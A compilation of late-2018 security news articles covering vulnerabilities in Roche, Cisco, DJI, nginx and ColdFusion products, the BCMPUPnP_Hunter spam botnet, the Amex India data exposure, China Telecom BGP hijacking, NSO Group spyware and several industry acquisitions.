Researchers at Medigate, a company specializing in securing connected medical devices, identified five vulnerabilities in three types of products from Roche. The flaws impact Accu-Chek glucose testing devices, CoaguChek devices used by healthcare professionals in anticoagulation therapy, and Cobas portable point-of-care systems.
A detailed list of vulnerable products and versions is available in an advisory published recently by ICS-CERT. It’s worth noting that each vulnerability impacts certain models and versions of the Roche devices.
The affected products consist of a base unit and a handheld device that communicates wirelessly – including over Wi-Fi if an optional module is available – with the base unit. Medigate researchers discovered that an attacker with access to the local network can hack the base station and from there target the handheld devices.
Serious vulnerabilities discovered in Roche medical devicesThe flaws, with CVSSv3 scores ranging between 6.5 and 8.3, can be exploited by a network attacker to bypass authentication to an advanced interface, execute code on the device using specific medical protocols, and place arbitrary files on the filesystem.
One of the command execution flaws requires authentication, but the ICS-CERT advisory shows that the affected products use weak access credentials, which suggests that it may be easy for an attacker to authenticate on the system.
“The vulnerabilities are easy to exploit once known, but are very hard to discover and research,” Medigate told SecurityWeek.
According to the company, the vulnerabilities can pose a threat to patients using the impacted devices.
“These vulnerabilities allow complete control of the base station and hand-held device including all generated network traffic. This means the medical protocol used by the device can be altered and the medical data can be changed. In the case of a blood glucose meter, this can put a patient at risk. If the device it altered, it could affect the readings or data transfer which could lead to incorrect treatment,” the company explained.
According to ICS-CERT, Roche is preparing patches for the vulnerabilities found by Medigate and they should be available sometime this month. In the meantime, the company has advised customers to restrict network and physical access to affected devices, protect connected endpoints from malicious software and unauthorized access, and monitor the network for suspicious activity.
ForeScout Acquires Industrial Security Firm SecurityMatters for $113 Million in Cash
10.11.2018 securityweek IT
Network access security firm ForeScout Technologies (NASDAQ:FSCT) announced on Thursday that has acquired operational technology (OT) network security firm SecurityMatters for approximately $113 million in cash.
The acquisition will help ForeScout provide deeper visibility into OT networks to help industrial firms mitigate threats and segment IT and OT environments, the company said.
Founded in 2009 by Damiano Bolzoni, Sandro Etalle and Emmanuele Zambon, SecurityMatters provides organizations with device visibility, continuous network monitoring, and threat and anomaly detection for industrial environments using passive network monitoring that doesn’t impact operations.
The two companies announced a technology integration partnership earlier this year.
ForeScout’s CounterACT visibility platform, combined with SecurityMatters’ technology, enables agentless device discovery, classification and assessment for a wide variety of devices across IT and OT infrastructure.
ForeScout has more than 2,900 customers in over 80 countries that use its solutions, which help accelerate incident response, automate workflows and optimize existing security investments.
Late last month ForeScout launched a partnership with industrial networking and security firm Belden.
Adobe ColdFusion Vulnerability Exploited in the Wild
10.11.2018 securityweek Vulnerebility
A recently patched remote code execution vulnerability affecting the Adobe ColdFusion web application development platform has been exploited in the wild by one or more threat groups, Volexity warned on Thursday.
The security hole in question is tracked as CVE-2018-15961 and it was resolved by Adobe in September with its Patch Tuesday updates. The vendor described the vulnerability as a critical unrestricted file upload bug that allows arbitrary code execution. This was one of the five flaws reported to Adobe by Pete Freitag of Foundeo.
The updates were initially assigned a priority rating of “2,” which indicates that exploitation is less likely. However, Adobe silently updated its advisory in late September after learning that CVE-2018-15961 had been actively exploited and assigned a priority rating of “1” for the ColdFusion 2018 and ColdFusion 2016 updates.
According to Volexity, which specializes in incident response, forensics and threat intelligence, there is no public exploit for the targeted ColdFusion vulnerability. The company says it has spotted what it believes to be a China-based APT group exploiting the flaw to upload an old webshell known as China Chopper to a vulnerable server.
The compromised web server had all ColdFusion updates installed, except for the one patching CVE-2018-15961. The attack took place roughly two weeks after Adobe released the fixes, the security firm said.
Volexity’s analysis showed that the vulnerability was introduced when Adobe decided to replace the older FCKeditor WYSIWYG editor with the newer CKEditor. The security bug is said to be similar to a ColdFusion flaw patched back in 2009.
Exploitation of the vulnerability is not difficult, Volexity noted, as it only requires sending a specially crafted HTTP POST request to the upload.cfm file, which does not require any authentication and is unrestricted.
While CKEditor prevented users from uploading certain types of potentially dangerous files, such as .exe and .php, it still allowed .jsp (JavaServer Pages) files, which can be executed in ColdFusion.
The APT group observed by Volexity exploited this weakness, along with a bug that allowed them to change the destination directory, to upload the webshell.
After spotting this attack, the company’s researchers started analyzing publicly accessible ColdFusion servers and found many systems that appeared to have been compromised, including ones belonging to government, educational, healthcare, and humanitarian aid organizations. Many of the hacked sites had been defaced or showed attempts to upload a webshell.
While the researchers could not confirm that all attacks exploited CVE-2018-15961, there is some indication that a non-APT threat group may have discovered the flaw months before Adobe released a patch in September, as some of the attackers’ files had been last modified in early June.
Some of the targeted websites included defaced index files that attributed the attack to AnoaGhost, a hacktivist group said to be based in Indonesia and which appears to have ties to pro-ISIS hacker gangs.
Prioritizing Flaws Based on Severity Increasingly Ineffective: Study
10.11.2018 securityweek Vulnerebility
The large number of vulnerabilities found every year has made it increasingly difficult for organizations to effectively prioritize the security holes exposing their applications and networks, according to a new report published on Wednesday by Tenable.
The company, which helps organizations reduce their cyber risk, has conducted a detailed analysis of the flaws discovered last year and in the first half of 2018.
Tenable has counted all the common vulnerabilities and exposures (CVE) identifiers assigned last year and determined that there were 15,038 new flaws discovered, compared to 9,837 in 2016, which represents an increase of more than 50%. There has been an increase of 27% in the number of vulnerabilities disclosed in the first half of 2018 compared to the same period of 2017, and the security firm estimates that this year the count could reach 18,000-19,000.
In 2017, over half of the vulnerabilities were rated “critical” or “high severity” - CVSSv3 assigns higher scores to flaws compared to CVSSv2. However, exploits were only made public for 7% of the total and only a small subset of those were actually weaponized and exploited by malicious actors.
According to Tenable, enterprises find, on average, 870 unique vulnerabilities per day, including newly discovered flaws and unpatched issues that were disclosed previously. Of all the vulnerabilities discovered so far, roughly 12% have been rated “critical,” which means organizations have to deal with roughly 100 weaknesses per day even if they prioritize only the most serious findings.
“Trying to remediate and mitigate all disclosed vulnerabilities, even when prioritizing High and Critical vulnerabilities, is an exercise in futility, as our data shows,” Tenable said in its report.
“Managing vulnerabilities at volume and scale across different teams requires actionable intelligence. Otherwise, we’re not making informed decisions – we’re guessing. An intelligence deficit in vulnerability management is causing real-world implications – with 34 percent of breached organizations stating they were aware of the vulnerability that led to their breach before it happened,” it added.
The company has found that roughly a quarter of all 107,000 CVEs assigned until October 2018 impact enterprise environments and nearly two-thirds of the vulnerabilities found by enterprises are “high severity” or “critical.”
The security holes most commonly found in enterprises impact software from Microsoft, Google, Oracle, and Adobe, including the .NET Framework, Chrome, Java, Internet Explorer, Flash Player and Outlook. More than a quarter of enterprises are also exposed to attacks due to issues related to SSL.
“The problem is we have too much information and not enough intelligence. Turning information into intelligence requires interpretation and analysis – something that doesn’t scale easily. The solution lies in operationalizing intelligence based on your organization’s unique characteristics – your most critical digital assets and vulnerabilities,” Tenable said.
The complete Tenable Vulnerability Intelligence Report is available on the company’s website in PDF format.
Entrust Datacard Acquires Spanish Firm Safelayer
10.11.2018 securityweek IT
Minneapolis-based identity firm Entrust Datacard has acquired Barcelona, Spain firm Safelayer Secure Communications. Financial details have not been disclosed.
Against a background of increasing digitization of both commerce and government, Entrust Datacard provides trusted identity and secure transaction technologies. Safelayer complements this with software for public key infrastructure (PKI) solutions, multifactor authentication systems, electronic signature, encryption and secure transactions, and for generating trust services in telematic networks such as the Internet and mobile networks.
The two key reasons for the acquisition appear to be geographic expansion (Safelayer is particularly strong in the EU and Latin America); and Safelayer's eIDAS competencies.
On the former, Anudeep Parhar, CIO at Entrust Datacard, commented, "At Entrust Datacard we are committed to being the industry leader in certificate-based security solutions across the regions we serve. As such, we look forward to bringing Safelayerís established PKI and Electronic Trust Services in EMEA and Latin America into our portfolio."
On the latter, he said, "The strong and talented team at Safelayer, coupled with their digital signature solution and eIDAS competencies, enhances our team and further establishes our commitment to accredited trust services across these regions and globally."
eIDAS, standing for 'electronic identification and trust services', is an EU Regulation that came into force in July 2016. As a Regulation it is required law in all EU member states. Its purpose is to enhance trust in electronic transactions between businesses, citizens and public authorities by providing a common legal framework for the cross-border recognition of electronic ID and consistent rules on trust services across the EU.
It provides a framework that allows EU citizens to use electronic ID to access public services in other member states; and establishes requirements for trust services and how trust service providers can gain qualified status.
In 2016, Safelayer became a founding member of the Cloud Signature Consortium. Its purpose is to develop a new standard for cloud-based digital signatures that will meet the requirements of eIDAS -- a standard that it expects to have a global impact.
In addition to market expansion opportunities, says Entrust Datacard in announcing the acquisition, it "also provides Entrust Datacard with Safelayerís best-in-class eIDAS-compliant digital signature technology. The digital signing solution is a comprehensive platform for eIDAS trust services that combines authentication, single sign on (SSO) and identity federation; the solution incorporates PKI for implementing electronic signature functions."
Entrust Datacard intends to maintain Safelayer's Spanish offices and existing staff.
This is Entrust Datacardís second security acquisition in under six months. The company made an investment in CensorNet and acquired its SMS Passcode solution in July 2018.
Snowden speaks about the role of surveillance firm NSO Group in Khashoggi murder
9.11.2018 securityaffairs BigBrothers
Snowden warns of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.
The popular US whistleblower Edward Snowden has reported the abuse of surveillance made by many governments, he blamed the Israeli company NSO Group for developing and selling surveillance software to Saudi Arabia.
Speaking during a conference in Tel Aviv on Wednesday, Snowden explained that the spy software developed by NSO Group enabled the murder of dissident journalist Jamal Khashoggi, at a conference in Tel Aviv on Wednesday.
Snowden claimed that Israeli company NSO Group had sold Saudi Arabia software that was used to compromise the smartphone of one of Khashoggi’s friends.
Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.
Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.
In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.
COUNTRY NEXUS REPORTED CASES OF INDIVIDUALS TARGETED YEAR(S) IN WHICH SPYWARE INFECTION WAS ATTEMPTED
Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.
According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.
Now Snowden claims that the Israeli surveillance firm NSO Group had a primary role in Khashoggi’s murder that is “one of the major stories that’s not being written about.”
“They are the worst of the worst in selling these burglary tools that are being actively, currently used to violate the human rights of dissidents, opposition figures, activists, to some pretty bad players,” Snowden told his audience.
The Snowden Video Interview was published by almasdarnews.com.
Snowden told to the audience that the surveillance firms don’t operate “to save lives, but to make money.”
NEW REPORT: The Kingdom Came to Canada: How Saudi-Linked Digital Espionage Reached Canadian Soil https://citizenlab.ca/2018/10/the-kingdom-came-to-canada-how-saudi-linked-digital-espionage-reached-canadian-soil/ …
10:02 PM - Oct 1, 2018
Twitter Ads info and privacy
The Kingdom Came to Canada: How Saudi-Linked Digital Espionage Reached Canadian Soil - The Citizen...
In this report, we describe how Canadian permanent resident and Saudi dissident Omar Abdulaziz was targeted with a fake package delivery notification. We assess with high confidence that Abdulaziz’s...
379 people are talking about this
Twitter Ads info and privacy
The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.
Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.
“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.
Compliance to Cybersecurity Requirements and False Claims Act
9.11.2018 securityaffairs Cyber
There’s a growing risk of companies receiving substantial fines for not complying with cybersecurity standards under False Claims Act.
However, an emerging concern for businesses that act as contract-based service providers for government entities is that those establishments could also be liable under the False Claims Act (FCA).
What Is the False Claims Act?
The False Claims Act is enforced at the federal level as well as in over two dozen states and the District of Columbia. It stipulates that private citizens can file lawsuits against entities engaging in fraud or dishonesty during certain government transactions.
The citizens that participate in such legal action are called whistleblowers and typically receive between 15 and 25 percent of the recovered amount in a successful suit. Many FCA violations relate to inaccurate billing or falsified information given to government authorities. However, federal contractors can also be held liable for not adhering to the terms of their agreements.
More specifically, the Supreme Court ruled that FCA liability can occur if a government contractor submits a claim for payment for services but does not mention nonadherence to a statutory, regulatory or contractual requirement. The contractor must also know that the shortcoming would affect the government’s decision to pay.
The Link Between the False Claims Act and Cybersecurity
It may not initially be clear how the FCA relates to cybersecurity until people realize that federal contractors must abide by numerous cybersecurity best practices under the Federal Acquisition Regulation (FAR), established June 15, 2016.
The FAR mentions 15 “basic safeguarding requirements” for cybersecurity, including sanitizing or destroying media or devices containing federal contract information at the end of their usage periods and limiting access to information systems so that it encompasses only the actions that authorized users should carry out — not additional privileges.
There’s also the Defense Federal Acquisition Regulation Supplement (DFARS). It relates to contractors working for the Department of Defense (DoD) and dictates how they must handle controlled unclassified information (CUI) by protecting it adequately and reporting breaches promptly.
Parties that did not get in compliance by the end of December 2017 were at risk of losing their contracts or getting stop-work orders. They also had to report how they failed to meet the standards set.
Then, in early 2018, the General Services Administration (GSA) announced plans to officially regulate how federal contractors protect information. Whereas the FAR does not cover cybersecurity breach reporting requirements, the GSA holds contractors responsible for reporting breaches and doing so to the appropriate parties within a defined timeframe.
A Lack of Cybersecurity Best Practices Could Cause Obstacles
The details about the regulations above show how companies that provide services to government entities could be liable under the FCA for not honoring the terms of their contracts — specifically those relating to cybersecurity. Each false claim made that falls within the specifications of the FCA carries a fine of $5,500 to $11,000. The offending party must also pay the whistleblower’s legal fees.
However, even the businesses that don’t experience that consequence of noncompliance could find that a lack of cybersecurity readiness hinders operations.
The DoD proposed taking cybersecurity into account when choosing contractors. Already, the body evaluates cost, schedule and performance. But DoD representatives recognize that contractors are at risk of being infiltrated by cybercriminals, so if contractors don’t take cybersecurity seriously, they could find it difficult to remain competitive during the contract bidding process.
Even businesses that provide non-DoD-related services could become limited by not focusing on appropriate levels of cybersecurity. If other government agencies follow the DoD’s lead and make cybersecurity a priority, the businesses that provide services to government-run entities like public schools or veterans’ affairs hospitals could find their federal associations ceasing.
Breaches Bring About Worldwide Headlines
The worst cybersecurity breaches attract attention around the world. The total number of victims could rise to the millions, and some attacks even threaten local infrastructure, such as power grids. Although the emphasis here was on U.S. cybersecurity, the matter of staying safe from online threats is a global concern.
It’s not difficult to see why government entities know they can’t afford to do business with companies that aren’t well protected against cybersecurity issues.
When businesses neglect cybersecurity, they could get sued under the FCA, lose government contracts and suffer substantial reputational damage.
BCMPUPnP_Hunter Botnet infected 400k routers to turn them in email spammers
9.11.2018 securityaffairs BotNet
Security researchers at 360 Netlab have discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that likely already infected around 400,000 machines to date.
Security experts from 360 Netlab security firm have recently discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that mainly targets routers that have the BroadCom UPnP feature enabled.
The BCMPUPnP_Hunter was first spotted in September, but researchers were able to capture the first sample only a month later.
Experts pointed out that the interaction between the botnet and the potential target takes multiple steps, it starts with tcp port 5431 destination scan-
“it starts with tcp port 5431 destination scan, then moving on to check target’s UDP port 1900 and wait for the target to send the proper vulnerable URL.” reads the analysis published by 360 Netlab.
“After getting the proper URL, it takes another 4 packet exchanges for the attacker to figure out where the shellcode’s execution start address in memory is so a right exploit payload can be crafted and fed to the target.”
Experts noticed that the amount of infection is very large, the number of active scanning IP in each scan event is about 100,000.
Once the device is compromised, the attacker implements a proxy network (tcp-proxy) that communicates with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, etc. This circumstance suggests the botnet may have been involved in spam campaigns.
Below some findings shared by the experts:
It can be seen that the scan activity picks up every 1-3 days. The number of active scanning IP in each single event is about 100,000
All together we have 3.37 million unique scan source IPs. It is a big number, but it is likely that the IPs of the same infected devices just changed over time.
The number of potential infections may reach 400,000 according to Shodan based on the search of banner: Server: Custom/1.0 UPnP/1.0 Proc/Ver
The geographical distribution for the scanner IPs in the last 7 days revealed that most of the infected devices are in India, the United States, and China.
The experts probed the scanners and discovered at least 116 different type of infected device information.
The malware sample analyzed by the experts is composed of the main body and a shellcode that is apparently designed specifically to download the main sample and execute it.
“The main function of shellcode is to download the main sample from C2(18.104.22.168:8738) and execute it.” continues the analysis.
“The shellcode has a full length of 432 bytes, very neatly organized and written, some proofs below (We did not find similar code using search engines). It seems that the author has profound skills and is not a typical script kid:”
The main sample includes an exploit for the BroadCom UPnP vulnerability and the proxy access network module. The main sample can parse four instruction codes from C2, enable the port scan, search for a potentially vulnerable target, empty current task, access proxy network.
The botnet was likely designed to proxy traffic to servers of well-known mail service providers. The researchers believe the proxy network established by the botnet is abused for spam due to the connections only made over TCP port 25.
A newly discovered botnet that appears designed to send spam emails likely infected around 400,000 machines to date, 360 Netlab security researchers warn.
Dubbed BCMPUPnP_Hunter, the threat was observed mainly targeting routers that have the BroadCom UPnP feature enabled. The botnet emerged in September, but a multi-step interaction between the botnet and the potential target prevented the researchers from capturing a sample until last month.
The interaction, 360 Netlab explains, starts with tcp port 5431 destination scan, after which the malware checks the target’s UDP port 1900 and then waits for the proper vulnerable URL. After four other packet exchanges, the attacker finally figures out the shellcode's execution start address in memory and delivers the proper exploit.
Following a successful attack, a proxy network is implemented, to communicate with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, and others, most likely with the intent to engage in spam activities.
Over the past month, the number of scanning source IPs has been constantly in the 100,000 range, though it also dropped below the 20,000 mark roughly two weeks ago. The scan activity picks up every 1-3 days, with around 100,000 scan source IPs involved in each scan event.
Overall, the researchers registered over 3.37 million scan source IPs, but they believe this large number is the result of some devices changing their IP over time.
By probing the scanners, 360 Netlab managed to obtain 116 different type of infected device information. The botnet is believed to have infected around 400,000 devices all around the world, with the highest concentration in India, the United States, and China.
The analyzed malware sample consists of a shellcode and the main body. The shellcode, apparently designed specifically to download the main sample and execute it, seems to have been created by a skilled developer, the researchers point out.
The main sample includes an exploit for the BroadCom UPnP vulnerability, as well as the proxy access network module, and can parse four instruction codes from the command and control (C&C) server: an initial packet without practical functionality, and commands to search for vulnerable targets, to empty the current task, and to launch the proxy service.
The botnet, the researchers say, appears designed to proxy traffic to servers of well-known mail service providers. With connections only made over TCP port 25 (which is used by SMTP - Simple Mail Transfer Protocol), the researchers are confident the proxy network established by the botnet is abused for spam.
Default Account Exposes Cisco Switches to Remote Attacks
9.11.2018 securityweek Attack
A default account present in Cisco Small Business switches can allow remote attackers to gain complete access to vulnerable devices. The networking giant has yet to release patches, but a workaround is available.
According to Cisco, Small Business switches running any software release come with a default account that is provided for the initial login. The account has full administrator privileges and it cannot be removed from the system.
The account is disabled if an administrator configures at least one other user account with the access privilege set to level 15, which is equivalent to root/administrator and provides full access to the switch. However, if no level 15 accounts are configured or existing level 15 accounts are removed from the device, the default account is re-enabled and the administrator is not notified.
Malicious actors can leverage this account to log in to a device and execute arbitrary commands with full admin privileges.
The vulnerability, tracked as CVE-2018-15439, was reported to Cisco by Thor Simon of Two Sigma Investments LP. The vendor says it’s not aware of any attempts to exploit the vulnerability for malicious purposes.
The flaw affects Cisco Small Business 200, 300 and 500 series switches, Cisco 250 and 350 series smart switches, and Cisco 350X and 550X series stackable managed switches. The vendor says Cisco 220 series smart switches are not impacted.
Until Cisco releases a patch, users have been advised to add at least one user account with privilege level 15 to their device’s configuration. The company’s advisory contains detailed instructions on how such accounts can be configured.
Cisco has also informed customers of a critical authentication bypass vulnerability affecting the management console in its Stealthwatch Enterprise product. A remote attacker can exploit the vulnerability to bypass authentication and execute arbitrary commands with admin rights.
Another critical vulnerability that allows arbitrary command execution with elevated privileges has been found in Cisco Unity Express.
Patches are available for both the Unity Express and the Stealthwatch Enterprise flaws and there is no evidence of malicious exploitation.
Cisco recently rolled out patches for a denial-of-service (DoS) vulnerability impacting some of its security appliances. The security hole has been exploited in attacks and the company released fixes only a week after disclosure.
Man Behind DDoS Attacks on Gaming Companies Pleads Guilty
9.11.2018 securityweek Attack
A 23-year-old man from Utah pleaded guilty this week to launching distributed denial-of-service (DDoS) attacks against several online gaming companies in 2013 and 2014.
According to the U.S. Justice Department, Austin Thompson targeted servers belonging to Sony Online Entertainment (later spun off and renamed Daybreak Game Company) and other companies. The man announced his attacks via the Twitter account @DerpTrolling.
The account still exists, but it hasn’t been active since January 2016, when it resumed tweeting after a break of more than one year.
Thompson has pleaded guilty to causing damage that exceeds $95,000 to a protected computer, for which he faces up to 10 years in prison, a fine of $250,000, and 3 years of supervised release. His sentencing is scheduled for March 1, 2019.
While authorities charged the Utah man for attacks between 2013 and 2014, DerpTrolling was active since 2011. DerpTrolling made some headlines in 2013 and 2014 after disrupting online gaming servers owned by EA, Sony, Riot Games, Microsoft, Nintendo and Valve.
At one point, the cybercriminal leaked some account credentials allegedly belonging to PlayStation Network, Windows Live and 2K Games users, but it later turned out that the data was either fake or not obtained as a result of a breach, as DerpTrolling claimed.
“Denial-of-service attacks cost businesses millions of dollars annually,” said U.S. Attorney Adam Braverman. “We are committed to finding and prosecuting those who disrupt businesses, often for nothing more than ego.”
DJI Drone Vulnerability Exposed Customer Data, Flight Logs, Photos and Videos
9.11.2018 securityweek Vulnerebility
Vulnerability Exposed DJI Customer Data and Drone Flight Logs, Photos and Videos Generated During Drone Flights
In August 2017 the U.S. Immigration and Customs Enforcement agency (ICE) issued an intelligence bulletin warning that Da Jiang Innovations (DJI) -- the world's largest drone manufacturer -- was "likely passing U.S. critical infrastructure and law enforcement data to [the] Chinese government." DJI strenuously denied the accusation.
Now Check Point Research has published details of a DJI vulnerability that would allow the Chinese government -- or anybody else in the world -- to simply take that data without any involvement from DJI. The vulnerability could provide full access to a drone user's DJI account. A successful attacker would be able to obtain cloud-based flight records, stored photographs, user PII including credit card details -- and a real-time view from the drone's camera and microphone.
The vulnerability, providing access to users' personal details, would be attractive to cybercriminals around the world. The flight records could also be used to track delivery drones to determine where deliveries are made in order to intercept and steal them.
The live camera view would be attractive to nation-state actors involved in critical infrastructure reconnaissance. Indeed, last year's ICE bulletin notes that the Los Angeles Sheriff's Office had announced its intention to deploy DJI drones for "barricaded suspects, hostage situations and other high-risk tactical operations, hazardous materials incidents, and fire related incidents."
It also notes that the contractor building a DHS National Bio and Agro-Defense Facility in Manhattan, Kansas, is using DJI drones "to assist with construction layout and provide security during construction."
The business and facility use of drones is growing rapidly. Check Point describes the potential espionage value in more detail. "For those looking to target critical infrastructure facilities such as energy plants or water dams," the researchers write, "analyzing intricate details and images of such facilities could easily reveal information that would prove highly useful in a future attack."
It points out that threat actors would be able to home in on various technologies to find out which vendor of CCTV cameras or biometric/electronic door locks an enterprise may be using. These products and suppliers could then be investigated to find the correct tools that could bypass them. "Indeed," says the Check Point report, "having a detailed view of sensitive areas could reveal to criminals and potential terrorists where security gaps in general may lie, and pave the path to exploiting those gaps."
This vulnerability, Oded Vanunu, head of products vulnerability research at Check Point, told SecurityWeek, "is a unique opportunity for malicious actors to gain priceless information -- you have an eye in the sky. Organizations are moving towards automated flights, sometimes with dozens of drones patrolling across sensitive facilities. With this vulnerability you could take over the accounts and see and hear everything that the drones see or hear. This is a huge opportunity for malicious actors."
It would be attractive to general criminals to gain PII and use or resell it, and for criminals and state actors to use "in targeted attacks against cities or sensitive facilities."
The vulnerability itself involves a loophole in DJI's customer identification. By attacking the token used to identify registered users across the various DJI services, Check Point gained access to all the DJI platforms. It required registering an account within the DJI user forum and then posting an XSS attack. "Unlike most account takeovers, though, that rely on social engineering methods to fool the target victim into sending the attacker their login credentials," note the researchers, "our team simply collected the user's identifying token via a regular looking link posted in DJI's forum to essentially hack into the victim's account across all platforms."
Once the identifying token is acquired, an attacker would be able to hijack the account, log in and gain access to the flight and personal data registered to the user's drone.
Check Point reported the vulnerability to DJI, and it was fixed on September 28, 2018.
A statement from DJI sent to SecurityWeek confirms the problem. "Check Point's researchers discovered that DJI's platforms used a token to identify registered users across different aspects of the customer experience, making it a target for potential hackers looking for ways to access accounts. DJI users who had manually uploaded photos, videos or flight logs to DJI's cloud servers could have seen that data become vulnerable to hacking. It could have also allowed access to some customer information, and users on the DJI FlightHub fleet management system could have had live flight information accessed as well."
DJI engineers subsequently classified the vulnerability as high risk, but low probability. The high risk is clear; but the low probability is explained as the necessity for "a complicated set of preconditions to be successfully exploited: The user would have to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum."
There is, adds the DJI statement, "no evidence it was ever exploited." It is worth noting, however, Check Point's closing comment: "the admin would not receive any notification that an attacker has accessed their account. Meanwhile, the attacker would have completely uninhibited access to login and view the drone's camera during live operations of any flights currently in progress, or download records of previously recorded flights that had been uploaded to the FlightHub platform."
Several Vulnerabilities Patched in nginx
9.11.2018 securityweek Vulnerebility
Updates released this week for the nginx open source web server software address several denial-of-service (DoS) vulnerabilities.
In addition to providing web server functionality, Nginx can be used as a load balancer and a reverse proxy. It powers roughly 400 million websites, which makes it one of the most widely used web servers. NGINX, Inc., the company behind nginx, has raised over $100 million, including $43 million in June 2018.
Nginx developers announced this week that versions 1.15.6 and 1.14.1 address two HTTP/2 implementation vulnerabilities that can lead to a DoS condition. The issues impact versions 1.9.5 through 1.15.5.
One of the flaws, tracked as CVE-2018-16843, can result in excessive memory consumption. The other security bug, discovered by Gal Goldshtein from F5 Networks and identified as CVE-2018-16844, can cause excessive CPU usage.
“The issues affect nginx compiled with the ngx_http_v2_module (not compiled by default) if the ‘http2’ option of the ‘listen’ directive is used in a configuration file,” explained nginx core developer Maxim Dounin.
Website administrators using nginx were also informed of a security hole affecting the ngx_http_mp4_module module, which provides pseudo-streaming support for MP4 media files.
The vulnerability, tracked as CVE-2018-16845, can allow an attacker to cause the worker process to crash or leak memory by getting the module to process a specially crafted MP4 file.
“The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the ‘mp4’ directive is used in the configuration file,” Dounin explained. “Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.”
This vulnerability impacts nginx 1.1.3 and later and 1.0.7 and later, and it was also patched with the release of versions 1.15.6 and 1.14.1 on November 6.
Records associated with 689,272 plaintext records Amex India customers were exposed online via unsecured MongoDB server.
Personal details of nearly 700,000 American Express (Amex India) India customers were exposed online via an unsecured MongoDB server.
The huge trove of data was discovered by Bob Diachenko from cybersecurity firm Hacken, most of the records were encrypted, but 689,272 records were stored in plaintext.
The expert located the database by using IoT search engines such as Shodan and BinaryEdge.io.
“On 23rd October I discovered an unprotected Mongo DB which allowed millions of records to be viewed, edited and accessed by anybody who might have discovered this vulnerability. The records appeared to be from an American Express branch in India.” states the blog post published by Diachenko.
AMEX records american express
689,272 plaintext records included personal details of Amex India customers’ phone numbers, names, email addresses, and ‘type of card’ description fields.
The archive included 2,332,115 records containing encrypted data (i.e. names, addresses, Aadhaar numbers, PAN card numbers, and phone numbers.
Seems like @AmexIndia exposed its #MongoDB for a while, with some really sensitive data (base64 encrypted). Now secured (just when I was preparing responsible disclosure), but question remains how long it was open. Found with @binaryedgeio engine.
10:12 AM - Oct 25, 2018
35 people are talking about this
Twitter Ads info and privacy
“Upon closer examination, I am inclined to believe that the database was not managed by AmEx itself but instead by one their subcontractors who were responsible for SEO or lead generation. I came to this conclusion since many of the entries contained fields such as ‘campaignID’, ‘prequalstatus’ and ‘leadID’ etc.” added Diachenko.
Diachenko promptly reported his findings to Amex India that immediately took down the server. At the time of writing is not clear how much time the server remained exposed online, Amex India that investigated the case declared that it did not discover any “evidence of unauthorized access.”
“We applaud AmEx’s rapid response to this issue, noting they immediately took down that server upon notification and began further investigations.” Diachenko concluded.
“As we learned from this incident, one never knows when transient firewall rules may inadvertently expose your development machines to the public. In this case, it appears to have only exposed some long-lost personal information of an unknown number of AmEx India customers, but for others, it could be critical intellectual property or even your entire subscriber base that is at risk of being exposed.”
Experts detailed how China Telecom used BGP hijacking to redirect traffic worldwide
9.11.2018 securityaffairs BigBrothers
Security researchers revealed in a recent paper that over the past years, China Telecom used BGP hijacking to misdirect Internet traffic through China.
Security researchers Chris C. Demchak and Yuval Shavitt revealed in a recent paper that over the past years, China Telecom has been misdirecting Internet traffic through China.
China Telecom was a brand of the state-owned China Telecommunications Corporation, but after marketization of the enterprise spin off the brand and operating companies as a separate group.
China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.
The two researchers pointed out that the telco company leverages the PoPs to hijack traffic through China, it has happened several times over the past years,
According to the experts, the activity went unnoticeable for a long time, but to better understand how it is possible to hijack the traffic let’s reads this excerpt from the paper:
“Within the BGP forwarding tables, administrators of each AS announce to their AS neighbors the IP address blocks that their AS owns, whether to be used as a destination or a convenient transit node.” states the paper.
“Errors can occur given the complexity of configuring BGP, and these possible errors offer covert actors a number of hijack opportunities. If network AS1 mistakenly announces through its BGP that it owns an IP block that actually is owned by network AS2, traffic from a portion of the Internet destined for AS2 will actually be routed to – and through – AS1. If the erroneous announcement was maliciously arranged, then a BGP hijack has occurred.”
On April 8th, 2010 China Telecom hijacked 15% of the Internet traffic for 18 minutes, experts speculate it was a large-scale experiment for controlling the traffic flows.
The incident also affected US government (‘‘.gov’’) and military (‘‘.mil’’) websites.
Many other similar cases were reported by the experts over the years, in December 2017, traffic for Google, Apple, Facebook, Microsoft, and other tech giants routed through Russia, also in this case experts speculated it was an intentional BGP Hijacking.
According to the research paper, China Telecom used numerous PoPs to hijack domestic US and crossUS traffic redirecting the flow to China over days, weeks, and months.
“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom.” continues the research.
“While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics –namely the lengthened routes and the abnormal durations,”
In February 2016, another attack hijacked traffic from Canada to Korean Government websites to China in what is defined as a perfect scenario of long-term cyber espionage.
